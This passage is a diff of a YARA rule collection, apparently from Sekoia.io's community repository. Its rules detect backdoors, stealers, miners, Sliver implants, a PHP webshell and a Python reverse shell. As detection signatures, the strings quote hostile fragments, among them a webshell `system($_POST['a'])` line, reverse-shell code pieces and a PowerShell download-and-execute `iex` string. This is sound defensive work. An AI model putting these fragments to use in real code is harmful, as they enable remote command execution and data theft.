+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_lazarus_lambload_timecheck.yar#L1-L67"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "019e559f3596cf83f7e7ada05f6550b50b2d45d577600fa549470b98af93e23b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234456,56 +235310,79 @@ rule SEKOIA_Apt_Spynote_Android_Dex_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "is not file found"
-		$ = "Can not access"
-		$ = "PANG !!"
-		$ = "On Start!!"
+		$chunk_1 = {
+        0F 85 ?? ?? ?? ??
+        8D 85 ?? ?? ?? ??
+        50
+        E8 ?? ?? ?? ??
+        83 C4 ??
+        83 78 ?? ??
+        0F 85 ?? ?? ?? ??
+        8B 48 ??
+        83 F9 ??
+        0F 8C ?? ?? ?? ??
+        83 F9 ??
+        0F 8D ?? ?? ?? ??
+        8B 40 ??
+        83 F8 ??
+        0F 8C ?? ?? ?? ??
+        83 F8 ??
+        0F 8D ?? ?? ?? ??
+        53
+        57
+        68 ?? ?? ?? ??
+        8D 85 ?? ?? ?? ??
+        6A ??
+        50
+        C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+        }
 
 	condition:
-		uint32be( 0 ) == 0x6465780A and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and any of them
 }
-rule SEKOIA_Apt_Gamaredon_Getlogicaldrive_Hunting : FILE
+
+rule SEKOIA_Backoor_Win_Tinyturla_Ng : FILE
 {
 	meta:
-		description = "Detects gamaredon powershell stuff"
+		description = "Detect the TinyTurla-NG backdoor used by Turla"
 		author = "Sekoia.io"
-		id = "18958ee8-7eb8-43b5-8ad2-be93bb39aa80"
-		date = "2023-02-08"
+		id = "019043bb-0212-4b73-bc93-03e9a746d28d"
+		date = "2024-03-04"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_getlogicaldrive_hunting.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4ec19e4d5723bc33d6f11598ce538403678e906bc416b58fea6e1b10cd26e5b6"
-		score = 50
-		quality = 60
+		reference = "https://blog.talosintelligence.com/tinyturla-next-generation/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backoor_win_tinyturla_ng.yar#L3-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a2fe2187e0cdd02fa31cbbecd600d044d4d12788ea6f76086aef7e77cbf232a0"
+		score = 75
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "267071df79927abd1e57f57106924dd8a68e1c4ed74e7b69403cdcdf6e6a453b"
+		hash2 = "d6ac21a409f35a80ba9ccfe58ae1ae32883e44ecc724e4ae8289e7465ab2cf40"
 
 	strings:
-		$ = "VolumeSerialNumber" ascii wide nocase
-		$ = "Get-WmiObject" ascii wide nocase
-		$ = "]::ToUInt32(" ascii wide nocase
-		$ = "DeviceID" ascii wide nocase
-		$ = "UploadValues" ascii wide nocase
-		$ = "UploadString" ascii wide nocase
+		$ = "delkill /F /IM explENT_USER\\Softwar"
+		$ = "Set-PSReadLineOption -HistorySaveStyle SaveNothing"
+		$ = "changeshell"
+		$ = "chcp 437 > $null"
+		$ = "powershell.exe -nologo"
 
 	condition:
-		5 of them and filesize < 500KB
+		uint16be( 0 ) == 0x4d5a and all of them or pe.imphash ( ) == "2240ae6f0dcbc0537836dfd9205a1f2b"
 }
-rule SEKOIA_Apt_Muddywater_Muddyc2Go_Dll_Launcher_Strings : FILE
+rule SEKOIA_Tool_Ssf_Strings : FILE
 {
 	meta:
-		description = "Detects MuddyC2Go DLL launcher"
+		description = "Detects SSF based on strings"
 		author = "Sekoia.io"
-		id = "59756195-d842-4038-8fbf-43d26f4353bc"
-		date = "2024-03-07"
+		id = "47fc3df8-a153-4045-a5f0-ed30df662984"
+		date = "2024-05-31"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_muddywater_muddyc2go_dll_launcher_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "1a0827082d4b517b643c86ee678eaa53f85f1b33ad409a23c50164c3909fdaca"
-		logic_hash = "b91653e313258ebd2073a398d0467800056ac94adab02c3a83aa8a379710e4e6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_ssf_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "a6fa09a25c90e00466a2b59f8c604084996224c93021ad72ed8705bf05da5d97"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234513,135 +235390,116 @@ rule SEKOIA_Apt_Muddywater_Muddyc2Go_Dll_Launcher_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "-Method GET -ErrorAction Stop;Write-Output $response.Content;iex $response.Content;"
-		$ = "GetCurrentProcess"
-		$ = "TerminateProcess"
+		$ = "could NOT read SSF reply"
+		$ = "SSF reply NOT ok {}"
+		$ = "SSF reply OK"
+		$ = "SSF protocol error {}"
+		$ = "SSF reply ok"
+		$ = "SSF version NOT read {}"
+		$ = "SSF version {}"
+		$ = "SSF version NOT supported {}"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 50KB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 4 of them
 }
-rule SEKOIA_Exploit_Linux_Eop_Cve20177308_Strings : CVE_2017_7308 FILE
+rule SEKOIA_Backdoor_Win_Sponsor : FILE
 {
 	meta:
-		description = "Detects CVE-2017-7308 exploit"
+		description = "Detect the Sponsor backdoor"
 		author = "Sekoia.io"
-		id = "72d225dd-386c-47d5-afb3-c6712c0bdd9a"
-		date = "2023-12-08"
+		id = "d410cdb7-a2a8-481e-a90a-49ef15a7a0e3"
+		date = "2024-03-29"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/exploit_linux_eop_cve20177308_strings.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "c9fd605ced8bb2c3861f642cdc08b99b320ee19658ce60f1b9679a1ccc427bf7"
+		reference = "https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_sponsor.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "844104863e8e0c49da3a41d39fe210e01329eeaecec6ffc231aae12392773ef6"
 		score = 75
 		quality = 80
-		tags = "CVE-2017-7308, FILE"
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "e5ee874bd59bb2a6dec700686544e7914312abff166a7390b34f7cb29993267a"
+		hash2 = "e2b74ed355d68bed2e7242baecccd7eb6eb480212d6cc54526bc4ff7e6f57629"
+		hash3 = "2a99cf7d73d453f3554e24bf3efa49d8109da9e8543db815a8f813559d083f8f"
+		hash4 = "c4dbda41c726af9ba3d9224f2e38fc433d2b60f4a23512437adeae8ef8986c57"
 
 	strings:
-		$ = "[.] SMEP & SMAP bypass enabled, turning them off"
-		$ = "[.] done, SMEP & SMAP should be off now"
-		$ = "[.] executing get root payload %p"
-		$ = "[.] done, should be root now"
+		$ = "Content-Type: application/x-www-form-urlencoded"
+		$ = "SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation"
+		$ = "\\Uninstall.bat"
+		$ = "\\config.txt"
+		$ = "\\node.txt"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Pe_Stealer_Scarletstealer_Strings : FILE
+rule SEKOIA_Apt_Emissarypanda_Web_Auto_Attack_Tool : FILE
 {
 	meta:
-		description = "ScarletStealer strings"
+		description = "Detect LuckyMouse's Web auto attack tool"
 		author = "Sekoia.io"
-		id = "ca930851-513f-44e5-abb4-ca0edfde3428"
-		date = "2023-12-15"
+		id = "c93eb792-a443-4c9a-8fcb-6015cc69f9b3"
+		date = "2022-08-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/pe_stealer_scarletstealer_strings.yar#L1-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "308055cbe960614112682585b5709a62c2639752df07661d6b2bb13e390b3b08"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_emissarypanda_web_auto_attack_tool.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "bc55758367ba0a6b5cf963bcb51b7770b2c7b1cf43b0b79e663b4110f6a7bba8"
 		score = 75
-		quality = 80
-		tags = "FILE"
-		version = "1.0"
-		classification = "TLP:CLEAR"
-
-	strings:
-		$s1 = "Scarlet Client" wide
-		$s2 = "] PC NAME:   (" wide
-		$s3 = "] IP:   (" wide
-		$s4 = " - Wallets -" wide
-		$s5 = "] Exodus:  (" wide
-		$s6 = "] Electrum:  (" wide
-		$s7 = "] Atomic:  (" wide
-		$s8 = "] Guarda:  (" wide
-		$s9 = "] Coinomi: (" wide
-		$s10 = "] Monero:  (" wide
-		$s11 = "] Ledger:  (" wide
-		$s12 = "] Bitbox:  (" wide
-		$s13 = "] Trezor:  (" wide
-		$s14 = ") Support: PointX@exploit.im - @isPointX" wide
-		$a2 = "/config/tk.txt" wide
-		$a3 = "/config/chatid.txt" wide
-		$a1 = "telebyt.com" wide
+		quality = 80
+		tags = "FILE"
+		version = "1.0"
+		classification = "TLP:CLEAR"
+
+	strings:
+		$ = "[192.168.1.1/24|192.168.1.1|192.168.1|@host.txt]" ascii
+		$ = "80,s443,8080,s8443,8000-8010" ascii
+		$ = "exploit When find module vul" ascii
+		$ = "<title>\\s*(.*?)\\s*</title>" ascii
+		$ = "<meta.+?charset=[^\\w]?([-\\w]+)" ascii
+		$ = "%s is not existed" ascii
+		$ = "%-15s %4d Open" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 2MB and 13 of ( $s* ) and 2 of ( $a* )
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Miner_Lin_Xmrig_Strings : FILE
+rule SEKOIA_Generic_Php_Webshell : FILE
 {
 	meta:
-		description = "Detects XMRig ELF"
+		description = "Detects generic webshell"
 		author = "Sekoia.io"
-		id = "2f99020b-424c-4433-860c-5e9ab4e1f1de"
-		date = "2022-09-08"
+		id = "415a96bd-11a4-40e7-8335-ac1f1a99d17c"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/miner_lin_xmrig_strings.yar#L1-L36"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4946e5099d7d342c8cf6644146ffec8506e786a1d4de0b05ef039bcf2b0fdad2"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_php_webshell.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "617264a785b8e9e87a39e12d7b72963d94e0686a174716347369fe71ab7a78af"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
-		modification_date = "2024-01-04"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "XMRig "
-		$ = "pool_wallet"
-		$ = "IP Address currently banned"
-		$ = "rigid"
-		$ = "diff_current"
-		$ = "shares_good"
-		$ = "shares_total"
-		$ = "avg_time"
-		$ = "avg_time_ms"
-		$ = "hashes_total"
-		$ = "pool address"
-		$ = "ping time"
-		$ = "connection time"
-		$ = "daemon+wss://"
-		$ = "daemon+https://"
-		$ = "daemon+http://"
-		$ = "socks5://"
-		$ = "stratum+ssl://"
-		$ = "stratum+tcp://"
+		$ = "system($_POST['a']);"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 10MB and 7 of them
+		all of them and filesize < 500
 }
-rule SEKOIA_Hacktool_Mimilite : FILE
+rule SEKOIA_Radx_Stealer : FILE
 {
 	meta:
-		description = "Detects Mimilite"
+		description = "detection of RADX stealer based on function named in the .NET payload"
 		author = "Sekoia.io"
-		id = "abb92a9d-0978-4ef2-b2cc-53ce6e83e3e4"
-		date = "2023-12-05"
+		id = "bf2aae08-169c-4bc9-a1ac-80f4b79ef6d7"
+		date = "2023-12-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_mimilite.yar#L1-L37"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "504bc58e1c4143cc2322d564b637b0e014a4ead44f56a75fe1202b0d0a2e8bbc"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/radx_stealer.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b83ca089bb0ea7ad8b0f372de9a95ea9d35514f6a063b63986e6fd25bdc07095"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234649,43 +235507,27 @@ rule SEKOIA_Hacktool_Mimilite : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk = {
-        FF C7
-        48 63 D7
-        46 0F B6 04 22
-        41 03 F0
-        81 E6 ?? ?? ?? ??
-        7D ??
-        FF CE
-        81 CE ?? ?? ?? ??
-        FF C6
-        48 63 CE
-        42 0F B6 04 21
-        42 88 04 22
-        46 88 04 21 }
-		$imp1 = "CryptGetHashParam"
-		$imp2 = "CryptDestroyHash"
-		$imp3 = "CryptHashData"
-		$imp4 = "CryptReleaseContext"
-		$imp5 = "CryptCreateHash"
-		$imp6 = "CryptAcquireContextA"
-		$imp7 = "VirtualAlloc"
+		$s1 = "get_FileName" ascii fullword
+		$s2 = "set_FileName" ascii fullword
+		$f1 = "TripleDESCryptoServiceProvider" ascii fullword
+		$f2 = "SendBase64ToServer" ascii fullword
+		$f3 = "SendCommandOutputToServer" ascii fullword
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of ( $imp* ) and $chunk
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize > 500KB and all of them
 }
-rule SEKOIA_Hacktool_Ntospy_Strings : FILE
+rule SEKOIA_Apt_Spynote_Android_Dex_Strings : FILE
 {
 	meta:
-		description = "Detects Ntospy based on strings"
+		description = "Detects Android SpyNote DEX file"
 		author = "Sekoia.io"
-		id = "c3281666-6a31-4718-a9c0-82944c6fdcb0"
-		date = "2023-12-05"
+		id = "87fb8b7a-bfac-4003-b618-50b4a7863928"
+		date = "2022-08-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_ntospy_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e5bd963419e515d65a03592051822fd801f4a21d54cdb18d408556c4bfef78f5"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_spynote_android_dex_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "474617628afe110d9e7ea2acef57c5e560139b57aa7e497bf9e111af239e9588"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234693,108 +235535,116 @@ rule SEKOIA_Hacktool_Ntospy_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "NPGetCaps"
-		$ = "NPLogonNotify"
-		$ = {43 00 3A 00 5C 00 [10-150] 00 2E 00 6D 00 73 00 75}
+		$ = "is not file found"
+		$ = "Can not access"
+		$ = "PANG !!"
+		$ = "On Start!!"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 300KB and all of them
+		uint32be( 0 ) == 0x6465780A and filesize < 1MB and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_5 : FILE
+rule SEKOIA_Apt_Ivanti_Krustyloader : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects KrustyLoader used in the Ivanti campaign"
 		author = "Sekoia.io"
-		id = "cb4d266e-f2b7-4642-a223-57180e66a9a6"
-		date = "2023-02-03"
+		id = "617fdd5f-7555-49e8-b0ec-2199f017dc40"
+		date = "2024-01-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_sharpshooter_payload_5.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a68342b5bb2622deb71432da85cc249f35ca5b7b5dc70e069d6dcb6e9488e97e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_ivanti_krustyloader.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "fe982dffcff4bec78593080d7745aeb32bc2e3b7e0df373bbbd53bc6f53cfcbf"
 		score = 75
-		quality = 80
+		quality = 30
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "rc4 = function(key, str)"
-		$ = "<job id=\"JS Code\""
-		$ = "var e={},i,b=0,c,x,l=0,a,r="
-		$ = "var plain = rc4("
-		$ = "eval(plain);"
+		$s1 = "/proc/self/exe" ascii fullword
+		$s2 = "||||||||||||||"
+		$s3 = "/tmp/"
+		$xor = {40 80 f5}
+		$chunk_1 = {
+        66 0F EF D0
+        66 0F 6F C3
+        66 0F 73 F8 0C
+        66 0F EF C1
+        66 0F EF C2
+        66 0F EF C3
+        }
 
 	condition:
-		all of them and filesize < 2MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 2MB and all of them and #xor > 2 and #chunk_1 > 6 and @s3 < @s2 and @s2 < @s3 + 300
 }
-rule SEKOIA_Crime_Sload_Zip_Archives : FILE
+rule SEKOIA_Implant_Any_Sliver_Not_Stripped : FILE
 {
 	meta:
-		description = "Detects ZIP archives used by sLOad"
+		description = "Rule which detects non stripped Sliver PE/Dlls/ELFs/MAC-O."
 		author = "Sekoia.io"
-		id = "5335ad65-bca5-4937-8634-46cbd7aa1b0e"
-		date = "2022-08-01"
+		id = "35543c7c-c39b-4f96-b37c-1d27736e40fc"
+		date = "2021-11-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/crime_sload_zip_archives.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f2bc6464de008f2ce40acabd87ebbd91659d317f57e223118937ba51f70d0f7f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/implant_any_sliver_not_stripped.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5240f3ea1fb421697eeb12eb17d0b31c036b53f39c3a590473d87065b5d28e3e"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		version = "1.0"
+		modification_date = "2021-12-22"
+		version = "1.1"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$pic = { 00 00 00 [6] 2E ( 70 6E 67 | 67 69 66 | 6a 70 67 | 6A 70 65 67 ) }
-		$pdf = { 00 00 00 [8] 2E 70 64 66 }
-		$vbs = { ( 4c 65 67 67 69 6d 69 | 66 69 73 63 ) 2e ( 77 73 66 | 76 62 73 ) }
+		$a1 = "github.com/bishopfox/sliver/implant/sliver/"
 
 	condition:
-		uint16be( 0 ) == 0x504B and filesize < 30KB and all of them
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 11MB and filesize > 8MB and #a1 > 200
 }
-rule SEKOIA_Bot_Lin_Lucifer_Strings : FILE
+rule SEKOIA_Observerstealer : FILE
 {
 	meta:
-		description = "Catch Lucifer DDoS - lin version - malware based on strings"
+		description = "detection based on the strings"
 		author = "Sekoia.io"
-		id = "c341b6d0-bc22-4a85-aebb-ed323487f524"
-		date = "2024-09-24"
+		id = "52314870-c100-441d-9ccf-07588325a401"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/bot_lin_lucifer_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "23276c627d27f36c1ec15b1779835b921652a8fcff898041f1920902262faf41"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/observerstealer.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "690bd5a16e780884641a66f06256a4147c092788f155644a8589d38b70dc4acc"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "DealwithDDoS" ascii
-		$s2 = "DecryptData" ascii
-		$s3 = "They say I'm rude. I'm not rude at all, but I still want to say, fuck your mother" ascii
-		$s4 = "stratum+tcp://" ascii
-		$s5 = "gethostip" ascii
-		$s6 = "GetmyName" ascii
+		$s1 = "URLOpenBlockingStreamW" ascii
+		$s2 = "processGrabber" wide
+		$s3 = "grabbers" wide
+		$s4 = {2F 00 73}
+		$s5 = "UNKNOWN_HWID" ascii
+		$s6 = {48 00 57 00 49 00 44}
 
 	condition:
-		uint32( 0 ) == 0x464c457f and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 400KB and all of them
 }
-rule SEKOIA_Apt_Cloudatlas_Powershower_Obfuscated : FILE
+
+rule SEKOIA_Infostealer_Win_Eternity : FILE
 {
 	meta:
-		description = "Detects obfuscated version of PowerShower"
+		description = "Detect the Eternity infostealer based on specific strings"
 		author = "Sekoia.io"
-		id = "f76ab9d8-7753-4a17-aedd-fc9c3b8cd322"
-		date = "2022-11-29"
+		id = "0ed8d4bd-d57f-40a8-a709-d69531d59847"
+		date = "2022-03-23"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_powershower_obfuscated.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fdb1edb3982eb5356cdf5fd1fa9fcc41d5048848b2a05589e87836ac0b05ec7a"
+		reference = "hxxp://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.]onion/threads/62331/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_eternity.yar#L3-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "06f0f7f51100278160f5bc4f588bb6a9d749be308f879bd5704666bf90764bf9"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234802,25 +235652,33 @@ rule SEKOIA_Apt_Cloudatlas_Powershower_Obfuscated : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "{0}{1}{2}{3}{4}{5}{6}{7}{8}" ascii wide
-		$s2 = "{000}{001}{002}{003}{004}{005}{006}{007}{008}" ascii wide
-		$s3 = "::Unicode.GetString([System.Convert]::FromBase64String(" ascii wide
+		$str0 = "Sending info to Eternity.." wide
+		$str1 = "Debug mode, dont share this stealer anywhere." wide
+		$str2 = "\\Growtopia.exe" wide
+		$str3 = "Software\\Growtopia" wide
+		$str4 = "Corrupting Growtopia.." wide
+		$str5 = "Disabling Task Manager.." wide
+		$str6 = "Deleting previous file from startup and copying new one." wide
+		$str7 = "Hiding file in Startup folder.." wide
+		$str8 = "Initializing File watcher.." wide
+		$str9 = "Decoder: Failed to delete temp login. No problem, continuing.." wide
+		$str10 = "dcd.exe" wide
 
 	condition:
-		($s1 in ( 0 .. 100 ) or $s2 in ( 0 .. 100 ) ) and $s3 in ( filesize -200 .. filesize )
+		uint16( 0 ) == 0x5A4D and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter0" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( pe.sections [ i ] . name == ".eter1" ) ) or 4 of ( $str* )
 }
-rule SEKOIA_Infostealer_Win_Solarmarker_Dll : FILE
+rule SEKOIA_Generic_Python_Reverse_Shell : FILE
 {
 	meta:
-		description = "Finds SolarMarker DLL based on characteristic strings"
+		description = "Detects simple reverse shell written in Python"
 		author = "Sekoia.io"
-		id = "a2fe7f09-7134-4054-ba40-5ea66785a26c"
-		date = "2022-12-09"
+		id = "ab25f8db-e39d-4aa4-b431-cf5cd2e038e5"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_solarmarker_dll.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5be0a95adb7e486cdec5f0e8433afed41516fc1a990e1d1ba00db7e8fb32dbbb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_python_reverse_shell.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "ced9923ef8018796545d93d9ac8ba3138dd7d4e79db742eb3babcd94c8d3c304"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -234828,94 +235686,83 @@ rule SEKOIA_Infostealer_Win_Solarmarker_Dll : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$zka = "zkabsr" wide
-		$str0 = "set_PersistKeyInCsp" ascii
-		$str1 = "get_IV" ascii
-		$str2 = "get_MachineName" ascii
-		$str3 = "get_Current" ascii
-		$str4 = "ps_script" ascii
-		$str5 = "request_data" ascii
-		$str6 = "WindowsBuiltInRole" ascii
-		$str7 = "DllImportAttribute" ascii
-		$str8 = "get_BlockSize" ascii
-		$str9 = "GetRequestStream" ascii
+		$ = "import pty"
+		$ = "lhost ="
+		$ = "os.dup2(s.fileno(),0)"
+		$ = "os.putenv(\"HISTFILE\",'/dev/null')"
 
 	condition:
